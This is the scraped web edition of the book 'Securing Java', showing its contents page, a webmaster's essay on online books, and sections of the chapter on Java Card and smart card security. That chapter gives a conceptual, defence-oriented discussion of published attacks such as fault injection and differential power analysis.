Table of Contents Previous Page
Next Page
Preface Chapter One
Mobile Code and Security: Why Java Security is Important
Chapter Two
The Base Java Security Model: The Original Applet Sandbox
Chapter Three Beyond the Sandbox: Signed Code in JDK 1.2 Chapter Four
Malicious Applets: Avoiding the Common Nuisances
Chapter Five
Attack Applets: Exploiting Holes in the Security Model
Chapter Six
Securing Java: Improvements, Solutions, and Snake Oil
Chapter Seven Java Security Guidelines: Developing and Using Java More Securely Chapter Eight
Java Card Security: How Smart Cards and Java Mix
Chapter Nine
The Future of Java Security: Challenges Facing Mobile Code
Appendix A
Frequently Asked Questions:Java Security FAQ Java versus Active X
Appendix B
Java Security Hotlist
Appendix C
How to Sign Java Code
References
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Order Securing Java (ISBN: 047131952X) from any of the following sources: ● ● ● ● ● ●
Amazon.Com Barnes & Noble Books-A-Million Borders John Wiley & Sons ... or automatically search for the lowest price on more than 25 online bookstores!
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Welcome to the online version of Securing Java: Getting Down to Business with Mobile Code. Putting a 300+ page book online is no easy task -- but hopefully navigating through it is. The online version of this book has been designed to work with you rather than against you to find information and read the text; generally, navigation should be pretty self-explanatory, but if you need a hand, here is a quick rundown of how things are laid out: ●
●
●
●
There is a chapter bar at the bottom of each page that allows you to jump to the front of any chapter in the book as well as other main sections such as the table of contents. When you get into reading the book itself, each front chapter page has a list of subsections that you can jump to. You can also use the arrows at the top of each page to go to the previous page or next page in the book. Keep in mind that one web page does not equal one physical page of the book, rather one page is usually equal to one full subsection of a chapter. You can search the text of the book from almost anywhere via the search box at the bottom of the page. Clicking on a footnote number will bring up a new window with the footnote. This works in Netscape and Opera, though Internet Explorer will open the footnote in the same window -- if you use IE, use the "Back" button to return to the chapter.
If you find a problem, please e-mail the Webmaster.
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
●
Read Securing Java on the Web About the Web Edition Excellent Reviews ● ●
●
The Java Security Website About the Authors Trade Articles By the Authors Featuring the Authors ● ●
● ●
Published by: John Wiley & Sons, Inc. (ISBN: 047131952X) Web site hosted by: Cigital
●
Java Security Hotlist
Search the Book
Search Help
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
About the Web Edition by Ryan A. MacMichael A little under ten years ago, there was a company betting their livelihood on the popularity of electronic books. They put out a handheld device that cost a few hundred dollars and offered e-books and emagazines on disk. This was before the Internet had become a household necessity and the idea did not go over very well at all -- they disappeared in less than a year. Why did they go under? For some of the obvious reasons: poor screen resolution, the general clunkiness of the reader, and it just didn't feel right needing batteries to read a book at the beach. It was pretty clear then that electronic books were not going to be a serious competitor to the physical book anytime soon. Cliff Stoll felt much the same way, as he talked at length about in Silicon Snake Oil: Second Thoughts on the Information Highway. I'd say, unequivocally, that the world is not ready for a handheld device like the one above to out-and-out replace the physical book. However, with the extreme popularity of the Web, the release of an online book is a wonderful complement to the release its physical counterpart: ●
●
●
Books don't have a satisfying search capability built into them. The index is usually somewhat helpful and a "top-level" navigation system like the table of contents works to a point, but what about when you're looking for that one small section you read a few days ago? The online book allows a reader to jump on the Net and run a quick search through the entire text. From a promotional standpoint, the online book makes deciding to purchase a text online as easy as reading a few passages of the same book from a physical store. Unlike reading selected passages that book mega-sites like Amazon may provide, having the entire text of your book online lets consumers see for themselves without leaving their home if it really fills their needs before ordering the paper version online. And the importance of a book existing in a hypertexted Web space can't be stressed enough. The very foundation of the WWW is the ability to use hypertext to a degree previously only dreamed of. The phrase "see also: section x in chapter y" works as a link directly to the cross-reference. A categorized list of links (like those in the appendices of this book) is much more accessible and usable, especially when accompanied by a searchable index. And details of a footnote or citation
can be easily accessed through an unobtrusive pop-up window. When you add a search facility, worldwide accessibility, and hypertext to a physical book, the additional value is immeasurable. With a site supporting a technical book like Securing Java the benefits are immediately obvious: ●
●
●
Searching the online text for "smart card SSL" is a lot quicker than jumping to the table of contents, choosing chapter eight, and then figuring out manually which section(s) refer to the use of SSL with Java smart cards. Now imagine you're at work and you read a feature in one of the weekly techie trade rags about Securing Java. You swing by Amazon and there's minor information, but not much, and you doubt that you'll have time to go to Borders on the way home to take a look at the book. Swing by the website and you can thumb through the book, so to speak, as if you were lounging in one of those comfy chairs at the book superstore. Lastly, in a book like Securing Java, direct links to lengthy research papers provide an added dimension a URL on paper can't provide. Being able to quickly download a postscript version of a doctoral thesis will add a new dimension to what you're reading online in another window.
The process of writing a book, especially a non-fiction text, is changing -- the author must consider providing web-based resources as seriously as adding an appendix. Whether these online resources are a list of links, text corrections and updates, or providing a full, searchable online text depends on the nature of the book, but it's clear that at least some level of support and information beyond traditional paper publishing is becoming necessary and hopefully through example, the Securing Java site will help clarify this importance. We hope you find the online version of Securing Java a useful supplement to the physical edition. We invite you to show your support for the effort put into the online version by purchasing the book.
Ryan MacMichael is the Webmaster at Reliable Software Technologies in Sterling, VA, and designed the online version of Securing Java. He has been previously published in BBS Callers Digest and spends too much of his spare time on perhaps the world's largest personal Web site. You can reach Ryan with any problems or comments at
[email protected].
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Previous Page
The Future of Java Security: Challenges Facing Mobile Code
Next Page
Now that you have reached this chapter, you have learned many things about today's Java security model. One of the key lessons emphasized throughout the book is that the current Java security model is more complex than ever. This makes Java security both difficult to understand and difficult to use securely. The people at Sun Microsystems and other Java licensees have gone to great lengths to provide a secure platform for mobile code and a set of tools with which to build security-critical applications. To some extent they have succeeded, as Java is more secure by far than any other mobile code architecture. The security model is complex; however, there are many things you can do to make your use of Java more secure. In addition, there are a number of challenges that remain for Java.
Chapter Nine Sections 1. 2. 3. 4.
Lessons from the Trenches Challenges for Secure Mobile Code Software Assurance for Java Should You Use Java?
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Java Card Security: How Smart Cards and Java Mix CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 Previous Page
Next Page
Section 8 -- Managing Risks
New functionality in the form of smart cards promises to help solve some tough, real-world problems and address important security concerns. With new functionality, however, comes new risks. The security dilemma remains: How much risk are you willing to take, and to what benefit?
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Java Card Security: How Smart Cards and Java Mix CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 Previous Page
Section 7 -- How Does the Use of Java Impact Smart Card Security?
Next Page
Much of the base security model found in Java's JDK 1.0.2 (and explained in Chapter 2) is not present in Card Java. For example, Card Java has no Security Manager class. This means the whole concept of security for Card Java applets is significantly different from the case of applets running on a standard browser-based VM. Fortunately, some of Card Java's "missing parts" may actually enhance the security situation; unfortunately, some of the changes introduce new security risks.
How Card Java Lessens Security Risks One of the most difficult problems in Java security is figuring out how to preserve type safety, while at the same time allowing dynamic class loading (see Chapter 2). If you can confuse the VM about the types of objects it is manipulating, you can break the security model. In its current form, Card Java takes care of this problem by removing dynamic class loading, making type safety easier to enforce. Class loading has always been problematic in Java and has introduced a number of serious security holes. Because it has no dynamic class loading, Card Java is less risky than regular Java from this perspective. Another constraint imposed by Card Java, lack of threading, makes security analysis of applet code much easier than it is normally. Threading is difficult to implement properly and to use properly, plus threading takes a fair amount of overhead in the VM and significantly impacts the VM footprint. Although there can be multiple applets resident on the same smart card, Card Java systems allow only one applet to be selected at a time. (The multiple-resident-applications concept introduces risks of its own, which we address later.)
How Card Java Increases Security Risks Lack of threads and the absence of dynamic class loading impact security in a positive way, but the opposite effect can be seen with other Card Java features. In other words, the removal of some features of Java (clearly intended to make possible the migration to Card Java) may introduce new security problems. Risks that are introduced involve: ● ● ● ● ●
Lack of garbage collection Exception propagation problems Multiple applications and applet firewalling Object-sharing loopholes Access to native code
These problems and their risks are discussed next. Garbage collection is a good example of a feature whose absence has a security impact. Without a system for freeing allocated memory, the problem of denial-of-service attacks is exacerbated. The Card Java 2.0 specification does not require implementation of garbage collection on a card (in fact, implementing garbage collection on a card would be no small feat). As a result, even subtle programming errors can wreak havoc on a smart card. Memory leaks are a classic problem in languages such as C++ that do not support automatic garbage collection [Hastings and Joyce, 1992]. (Note that the term memory leak refers to memory becoming full when objects are inefficiently created and destroyed.) Since Card Java does not support garbage collection, logic errors in applet code may over time exhaust free memory, rendering the card useless. This problem is especially acute on cards with limited memory resources. Another closely related issue is the "dangling reference" problem, in which a program frees memory even though it still has a pointer to that memory. The problem is that the freed memory may be recycled for another purpose, and then the old "dangling" pointer may be used, resulting in memory corruption. Unfortunately, garbage collection is expensive in terms of both time and computational resources. Nevertheless, the risk of memory leaks is real. The requirement to ensure that these kinds of errors do not occur raises the need for extensive testing and analysis of Card Java applet code. Exception propagation is an interesting issue for Card Java as well, since uncaught exceptions could lead to a card being muted (disabled for normal use). The potentially fatal effect of unhandled exceptions implies another significant exposure to unintended denial of service, once again resulting from subtle programming errors. As with memory exhaustion, the requirement to ensure that these kinds of errors do not occur raises the requirements for extensive testing and analysis of the Card Java applet code. Since Card Java allows multiple applications to be resident on the same smart card, there is a risk of interapplication attacks. This risk is especially relevant in situations where applets may be provided by competing vendors. Card Java defines applet firewalls meant to protect applets from one another, although it is not exactly clear what technology underlies this terminology. It appears that the main protections between applets are related to memory management; in particular, applets are not allowed to access
memory arbitrarily on the card. As a default, they can only get access to objects that they own (which are mapped into card memory during applet installation). It is clear that the memory protection mechanisms must be perfectly implemented to allow safe use of multiple applets. Plans are in the works for smart card applications that cooperate with each other. Imagine, for example, a card that works both as a debit card and as a frequent flyer card. Such plans may introduce more security risk than they are worth. One feature that is in high demand in systems with multiple applications is object sharing. Card Java 2.0 includes an object sharing approach that includes a loophole. The current approach is described as follows: The JCRE keeps track of the currently selected applet as well as the currently active applet. The currently active applet value is referred to as the applet execution context. When a virtual method is invoked on an object, the applet execution context is changed to correspond to the applet that owns that object. When that method returns, the previous context is restored. Invocations of static methods have no effect on the applet execution context. The applet execution context and sharing status of an object together determine if access to an object is permissible [Sun Microsystems, 1997]. To illustrate the implications of this approach, consider an example with three applets named A, B, and C as shown in Figure 8.3. Applet A shares an object it owns, x, with applet B. Applet B shares an object it owns, y, with applet C. A virtual method in the object owned by B, called y.bar, and shared with C invokes a virtual method in the object owned by A, called x.foo. Now if applet C is selected, it has permission to invoke virtual methods of the object owned by applet B, including the one that in turn invokes the virtual method in an object owned by applet A. In other words, C indirectly invokes x.foo.
Figure 8.3 Sharing a virtual method with another applet is tantamount to allowing that applet complete control over the method. The problem is illustrated here. Applet A may think it is sharing method foo() only with Applet B, but Applet B can in turn share the method (through method bar()) with Applet C. If A doesn't want to share with C, this may be a problem. PLEASE NOTE: In the above image, between Applets B and C should read "share (y,C)."
In short, if virtual methods are used, granting an applet permission to access an object amounts to also granting that applet the ability to export indirect access to that object to any other applet. This has a clear weakening effect on any assurance about the protection of an object. For static methods, such access is
prohibited, since static methods do not change the applet context. Restricting virtual methods in the same way that static methods are restricted may add some complexity to sharing schemes. The upshot of this change would be that an applet will be forced to share the object explicitly with all other applets that directly or indirectly need to be granted access permission. By far the biggest risk presented in the design of Card Java is a potential ability for a vendor to add and use Native methods on the platform. Obviously, this will compromise portability (applets that use Native methods will not be automatically portable to other cards), and it may expose the card to dangerous code that exists outside the applet firewalls. In fact, if Native methods are available, the concept of firewalls deteriorates. Native code is not restricted by the JCRE mediation of access, and misuse is possible. The very real security concern is that an attack applet will make use of Native code to carry out operations that would otherwise be stopped by the JCRE. When Native code executes, all bets are off for the Java Virtual Machine and its protection mechanisms. Native code in applets completely breaks the idea behind Java security. Attack applets are likely to make use of Native method calls. The five new risks we have covered were introduced into Java with its transformation to Card Java. Although Card Java certainly presents an intriguing new set of risks in terms of security, it does nothing to address several important fundamental security concerns associated with smart cards, including the problem of physical attacks and the terminal problem (both discussed earlier in the chapter). It is important to keep in mind that the non-Java-related problems have a real impact on card security and that they are not solved by Card Java.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Java Card Security: How Smart Cards and Java Mix CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 Previous Page
Section 6 -- What Role Can Smart Cards Play in E-Commerce Systems?
Next Page
E-commerce means different things to different people. Some people, for example, limit the meaning of ecommerce to commerce conducted over the Internet and the Web. For the purposes of this chapter, we're going to use the term more widely. So, by e-commerce, we mean everything from electronic business-tobusiness traffic (for example, Electronic Data Interchange), through Internet-based systems, to any system in which money is represented as bits. Under this admittedly overly broad definition, almost the entire economy is touched by some aspect of e-commerce. We're intentionally invoking this broad definition to emphasize the utility of smart cards for transacting business. Smart cards are seemingly an excellent medium for carrying password-protected personal data. Private information such as medical records or secret crypto keys can be stored on a card in a form accessible only to the card carrier (or at least someone who knows the right secrets). In addition, smart cards can store value. Card carriers can decide with whom to share data and with whom to transact business and use their cards only with those vendors they choose to trust. The most common form of smart card for commerce is the register-based, stored-value card. Somewhat ironically, one of the most unfortunate consequences of this kind of smart card is that secret keys on the card are known only to the issuing bank and must remain secret from the owner. If the card owner can somehow retrieve a secret key, then he or she can mint electronic cash. In light of the physical attacks sketched earlier in the chapter, this is a serious problem. Multiple-application smart cards like the Java Card should directly impact the marketability of smart card technology for e-commerce. When a single card can replace the many cards most consumers carry around today, people are likely to want it. Imagine a single card that both holds personal information (such as driver's license, social security, medical information, auto insurance, voter registration, workplace ID, Web site passwords, keys for making digital signatures and encrypting data) and also provides multiple
functions (working as a phone card, a charge card for a store, a video rental credit tracker, a credit card, a debit card, and an electronic cash repository). Leading Web vendors like Netscape are developing APIs for smart card interfaces. The idea is to use a smart card to store cryptographic data for use with existing protocols such as SSL. This will allow Netscape users to interact over the Web with a well-understood (and widely accepted) protocol. Microsoft is also building smart card interfaces into its products. The first use of smart cards for e-commerce is likely to be as a key/identity repository. In this case, smart cards act as highly portable hardware tokens that can be uniquely identified. Smart cards can store personal digital certificates for use with the SET protocol and other authentication-based protocols [Ghosh, 1998]. This could make it possible to carry out Web-based commerce on Internet kiosk systems of the sort occasionally found in airports and coffee shops.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Java Card Security: How Smart Cards and Java Mix CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 Previous Page
Next Page
Section 5 -- How Secure Are Smart Cards?
Before we dig into the security implications raised by putting a Java VM on a smart card, we need to address the issue of basic smart card platform security. Smart cards are funny things. Depending on how they're used, smart cards can sometimes be meant to keep secrets from the very people who carry them around and use them. Consider, for example, a smart card that stores monetary value in an internal register. If the card user can figure out a way to change the value of the register outside of traditional means, he or she might be able to mint money! Smart cards like this make tempting targets for bad guys. Because smart cards are often used in security-critical situations, they have undergone a fair amount of scrutiny from security researchers. Two main results are worth considering before we get into security issues specific to Java: 1) the terminal problem, and 2) physical attacks on the card.
The Terminal Problem Smart cards need a way to interact with their users. Since there is no built-in display capability in most cards, the CAD must take on this responsibility. Any display used during critical transactions, such as transferring money, needs to have two properties: the display must be trustworthy, and it must be unspoofable. Making sure a terminal presents proper and trustworthy information to a user is known as the terminal problem. The terminal problem is really a trust issue. How is a card user to be sure that the card is doing what it is supposed to be doing during a transaction? How can a card user check to see whether account balances (for example) have been properly debited or credited? The problem is that cards are very much black boxes.
Many systems now on the drawing board include the use of personal computers as client-side CADs. Consumers will use a PC to interact with the smart card and to address the concerns raised by the terminal problem. The problem is that PCs are notoriously insecure, especially when they're used to exchange lots of documents and programs, as most consumers do. If you use your computer this way, you're taking on a great deal of risk. One direct consequence of PC untrustworthiness is a PC's impotence relative to the terminal problem. If your PC can't be trusted, how can you believe that what it is telling you on behalf of your smart card is correct? In fact, one excellent reason for using smart cards at all is that PCs can't be trusted. The reasoning goes that it is better to store secrets like PINs, sensitive personal data, and private keys on a smart card than on a PC. That way, if the PC is compromised, your secrets can't be so easily stolen. However, this leaves us with the terminal problem. A scenario can make this more concrete. Imagine that someone has tampered with your Web browser either by hacking into your PC or by tampering with the Web browser executable before you downloaded it. Now clearly you can't trust the browser not to steal or rewrite data on the way from your smart card to you. Some things that might happen are: ●
●
●
The smart card requires a PIN before it can be used. Through a browser interface, you are queried for your PIN (which you faithfully enter). The corrupted browser sees the PIN go by and stores it for later illicit use. The PC is used as a listening post in order to carry out capture/replay attacks against the smart card (these kinds of attack often work against cryptographic protocols unless the protocols are carefully designed to address this problem). The PC steals the private key off the smart card and is able to "legally" represent you by digital signature.
What is needed is a trusted display. Some researchers have suggested that PDAs such as 3Com PalmPilots might serve as trusted displays. The idea is that the PDA can interact directly with the user during securitycritical operations like PIN input. In fact, the PDA can replace the smart card entirely since it can easily carry out all the required computations. (PDAs are probably too unwieldy for this idea. It's much easier to slide a smart card into your wallet than a PalmPilot.) Unfortunately, there is not much reason to trust a PalmPilot much more than a PC these days. The problem is that newer PalmPilots and other PDAs are designed to network with PCs directly (sometimes even using a TCP/IP stack). That's good news if you want to transfer data to and from your PDA, but it's risky. Just like a PC, a PalmPilot is probably insecure if you frequently download programs onto it. Crackers are currently devising hacks that work against PalmPilots. In the end, we're stuck with the terminal problem. As smart cards move into more widespread use on PCs, PC-based interfaces will be especially susceptible to this problem. An insecure Windows 95 OS in concert with a Web browser should not be trusted to display critical information to a smart card user. A PDA might do the trick, but is likely to carry similar risks.
Physical Attacks on Smart Cards The most obvious and direct attack on a smart card is a physical attack on the card itself. In the case of a stored-value card, this sort of attack may even be carried out by the owner of a card. Physical attacks attempt to reverse engineer the card and determine the secret key(s). Such attacks have been demonstrated in practice against commercial secure smart card chips, most notably by three groups of researchers: Dan Boneh, Richard DeMillo, and Richard Lipton of Bellcore; Ross Anderson of Cambridge and Marcus Kuhn of Purdue; and Paul Kocher and colleagues of Cryptography Research, Inc.
Boneh, DeMillo, and Lipton Boneh, DeMillo, and Lipton, three Bellcore researchers, published a paper called On the Importance of Checking Cryptographic Protocols for Faults in which they pointed out that an adversary who can introduce computational errors into a smart card can deduce the values of cryptographic keys hidden in the smart card [Boneh, et al., 1997]. The surprising part is that an attacker can do this even without precisely controlling the nature of the errors or even the exact timing of the errors. By comparing the result of an erroneous encryption with the result of a correct encryption of the same data, the attacker can learn something about the correct encryption key. By doing enough of these comparisons, the attacker can learn enough information to deduce the entire encryption key. How does the attacker introduce errors? There are plenty of ways. The attacker can subject the smart card to fluctuations in temperature, input voltage, or clock rate; point a radiation source at the card; or hit the card with a rubber mallet. Anything that is likely to cause voltages inside the card to fluctuate will do. Biham and Shamir later generalized this attack with a technique called Differential Fault Analysis, which works against a wide range of cryptographic algorithms. The upshot of all this is that unless a smart card cryptography mechanism is very carefully designed, any secret keys stored inside the card might be extracted by a determined attacker.
Anderson and Kuhn In a paper entitled Tamper Resistance - A Cautionary Note (www.cl.cam.ac.uk /users/cm213/Publications/tamper.html), Anderson and Kuhn point out that "smart cards are broken routinely" and to the extent that their secure use requires tamper resistance, smart cards "should be treated with circumspection." The paper describes a number of smart card attacks, many of which can be carried out by amateur attackers with very limited resources [Anderson and Kuhn, 1996]. Attacks described include voltage manipulation, temperature manipulation, chip removal (for easier probing), UV light attacks, and microprobing. More sophisticated attacks requiring professional equipment and materials involve uncovering the layers of a chip by etching, discerning chip behavior by advanced infrared probing, and reverse-engineering chip
logic. The somewhat gloomy conclusion is that, at best, chip designers can only impose costs and delays on attackers, never providing guaranteed security. Many businesses that rely on smart card security realize this and do all they can to manage the risks prudently. Users should do the same. Some caveats: the Anderson and Kuhn work is somewhat dated and is based on attacks carried out in the lab against conventional micro-controllers, which are usually much simpler than today's smart cards. Micro-controllers provide a great deal of open access to potential attackers since they are meant to be interactively programmed. For example, micro-controllers often provide an interface for external memory; generally speaking, smart cards don't have this feature. Thus they provide less of a beachhead for attacks. Of course Java complicates this line of reasoning somewhat. Card Java provides a platform that is meant to be programmable in the sense that applets may be loaded onto a smart card after it is issued. Mechanisms for loading new code onto a smart card provide a good starting point for an attacker.
Differential Power Analysis In 1998, Researchers at Cryptography Research, Inc., led by Paul Kocher, publicly announced a new set of attacks against smart cards called Differential Power Analysis (DPA). DPA can be carried out successfully against most smart cards currently in production. DPA is a complicated attack that relies on statistical inferences drawn on power consumption data measured during smart card computation. The equipment required to perform DPA is simple: a modified smart card reader and some off-the-shelf PCs. The algorithm itself is quite complex, but details have been widely published. Chips inside a smart card use different amounts of power to perform different operations. By hooking a card up to an oscilloscope, a pattern of power consumption can be measured. Particular computations create particular patterns of spikes in power consumption. Careful analysis of the peaks in a power consumption pattern can lead to the discovery of information about secret keys used during cryptographic computations. Sometimes the analysis is straightforward enough that a single transaction provides sufficient data to steal a key. More often, thousands of transactions are required. The types of sensitive information that can leak include PINs and private cryptographic keys. Figure 8.2 is a conceptual diagram of DPA.
Figure 8.2 Differential Power Analysis. Paul Kocher and his colleagues at Cryptography Research devised a monitoring attack on smart cards based on information leaked through card power consumption. This figure used by permission from Cryptography Research.
Possible solutions include masking power consumption with digital noise or throwing random calculations into the mix. Another potential solution is randomizing the order of card computations so that in the end, the same computation is performed using different patterns of primitives. All of these potential technological solutions are ways to mask the giveaway patterns in the power consumption of the card. DPA is actually a variation on an earlier attack discovered by Kocher. The earlier attack exploited the fact that some operations require different amounts of time to finish, depending on which values they are computing. In the same way that DPA allows an attacker to piece together key information based on variations in power consumption, Kocher's timing attack allows an attacker to piece together a key based on variations in the amount of computing time required to encrypt various values. One thing to note is that legitimate users of smart cards don't have to worry too much about DPA or timing attacks, because the attack requires physical access to the card itself. Unless you lose your card or insert it directly into an attacker's machine, there is not much threat that your card itself will be cracked. The main risk that DPA presents is to companies that must concern themselves with widespread fraud of the sort carried out by organized crime. The best approach is to assume information will leak from a smart card and design systems in such a way that they remain secure even in the face of leaking information. An approach of this sort may preclude smart card systems designed to do all processing offline without a centralized clearinghouse. Detailed technical information about DPA can be found on the Web at www.cryptography.com/dpa/technical/index.html.
No Free Lunch It should not be surprising that smart cards have their own set of risks- 100-percent security is an
unattainable goal. Once again, risk management and defensive design are optimal strategies.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Java Card Security: How Smart Cards and Java Mix CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 Previous Page
Next Page
Section 4 -- How Can Java Fit on a Card?
Even a stripped-down version of Java and its accompanying VM requires a fair amount of computational power in order to work. To be capable of running Card Java, a smart card must have at least 16K of readonly memory, 8K of EEPROM, and 256 bytes of random access memory. Given a Java Virtual Machine on a smart card, the number of possible new applications is mind-boggling. With an off-the-shelf (or off-the-Net) application development environment for Card Java, thousands of Java developers will be able to program smart cards. Gemplus and Schlumberger both distribute commercial Card Java environments. Of course, the memory and interface constraints of smart cards deeply affect programming style, testing concerns, and other aspects of program development. Card Java has many features familiar to Java developers, especially those developers familiar with JDK 1.0.2. Card Java includes: ● ● ● ● ●
Packages Dynamic object creation Virtual methods Interfaces Exceptions
Elements of Java that are not supported include: ● ● ● ● ● ●
Dynamic class loading A security manager Threads Cloning Garbage collection Finalization
A number of limitations are also imposed on runtime card application (or cardlet) behavior. The "Java Card 2.0 Language Subset and Virtual Machine Specification," a Sun Microsystems document available on the Web at www.javasoft.com/products/javacard/index.html, describes the smart card version of Java in more detail. In the current Card Java paradigm, applets live on a card forever once they are installed during a process commonly called personalization. More specifically, although an applet's byte code may stay on the card forever once it is masked onto a card, an applet can be marked as unavailable and thus be permanently disabled. All applets that will be used on a card are installed at one time, before the card is issued to a consumer. These applets are selected and deselected by the Java Card Runtime Environment (JCRE). The JCRE is made up of the Virtual Machine and the core classes of the Java Card API. It keeps track of applets that are selected and currently active. The JCRE is in this sense the card executive, receiving messages (known as APDUs) on the input lines and carrying out the appropriate activities such as selecting an applet. Only one applet can run at a time in current Card Java implementations. Future versions of Card Java are likely to allow applets to be loaded onto an existing card even after it has been issued to a consumer (much the same way that applet code is loaded into a browser's VM). This introduces a number of security risks, including the risk that downloaded applet code will behave maliciously (in the manner of the hostile applets detailed in Chapter 4, "Malicious Applets: Avoiding a Common Nuisance," and Chapter 5, "Attack Applets: Exploiting Holes in the Security Model") and the risk that poorly engineered code will disable or otherwise break the platform. Unlike VMs inside browsers, a smart card VM is not quite as easy to restart, nor are the security mechanisms as rigorous. By this point, it should be clear that Card Java has important security implications. These implications take on even more importance when smart cards are used in e-commerce systems.
Search the Book Previous Page
Search Help
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs
Next Page
Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Java Card Security: How Smart Cards and Java Mix CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 Previous Page
Next Page
Section 3 -- Why Put Java on a Smart Card?
As we mentioned earlier, one obstacle blocking widespread use of smart cards in U.S. markets has been the large number of incompatible and often obscure development languages available for writing smart card applications. Regardless of the ISO 7816 specifications, programming languages for smart cards have traditionally amounted to special-purpose assembly languages. Few developers were familiar with card application languages, the upshot being that only a handful of people could develop smart card code. As cards become computationally more powerful, new application languages are being designed and put into use. One of the most interesting new systems is Java Card 2.x (see www.javasoft.com/products/javacard/index.html). The problem of multiple, noninteroperable platforms is not limited to smart cards, of course. A major part of Java's appeal is that it was designed as a cross-platform solution. Developers have always wanted a solution to the platform problem (other than the adoption of one single proprietary platform controlled by a monopoly). Java is one good way of addressing the platform problem on smart cards. A Java card is a smart card that is able to execute Java byte code, similar to the way Java-enabled browsers can. But standard Java with all of its libraries (especially in the Java 2 guise) is far too big to fit on a smart card. A solution to this problem is to create a stripped-down flavor of Java. Card Java is just such a flavor. It's based on a subset of the Java API plus some special-purpose card commands. Besides providing developers with a more familiar development environment, Card Java also allows smart cards to have multiple applications on them. For the most part, existing smart card products (especially in the financial arena) have only one application per card. This application is automatically invoked when power is provided to the card or the card is otherwise reset. The one-application-per-card paradigm doesn't scale well, to say the least. Who wants to carry 20 credit cards around? Card Java can solve this problem by allowing multiple applications, potentially written by different organizations, to exist on the same card. The idea of multiple applications running on the same VM by potential competitors raises a number of security issues, which we address later in the chapter.
Search the Book Previous Page
Search Help
Next Page
Chapter... Preface -- 1 -- 2 -- 3 -- 4 -- 5 -- 6 -- 7 -- 8 -- 9 -- A -- B -- C -- Refs Front -- Contents -- Help Copyright ©1999 Gary McGraw and Edward Felten. All rights reserved. Published by John Wiley & Sons, Inc.
Java Card Security: How Smart Cards and Java Mix CHAPTER SECTIONS: 1 / 2 / 3 / 4 / 5 / 6 / 7 / 8 Previous Page
Next Page
Section 2 -- What Is a Smart Card?
A smart card looks just like a credit card, only with a chip embedded in its plastic. Imagine replacing the hologram on a standard credit card with a similarly thin chip and you get the idea. Most smart card chips are about the size of a dime (only thinner) and can be recognized by their distinctive gold terminals. Figure 8.1 shows a Visa smart card.
Figure 8.1 Visa has been active in the development of the Java Card. Visa's Open Platform classes interact with Java Card to provide a secure framework for which to develop smart card applications. (This figure used by permission from Visa.)
A smart card chip is actually a complete little computer with nonvolatile memory, storage, a card operating system (COS), and accompanying communication protocols. The most advanced smart cards on the market have the processing power once found in an IBM-XT (with less memory, of course). There are many different uses for smart cards. Smart cards can serve as:
●
●
●
● ● ●
Security cards that are able to identify the carrier using advanced authentication algorithms and can safely store secrets like private keys Electronic wallet cards that use several different approaches to store value and provide a kind of electronic cash Transaction cards that take over the role once played by the magnetic stripe commonly found on the back of credit cards Processor cards that carry out proprietary calculations in a black box fashion Memory cards that act as highly portable databases Cards with Virtual Machines that run Java applets
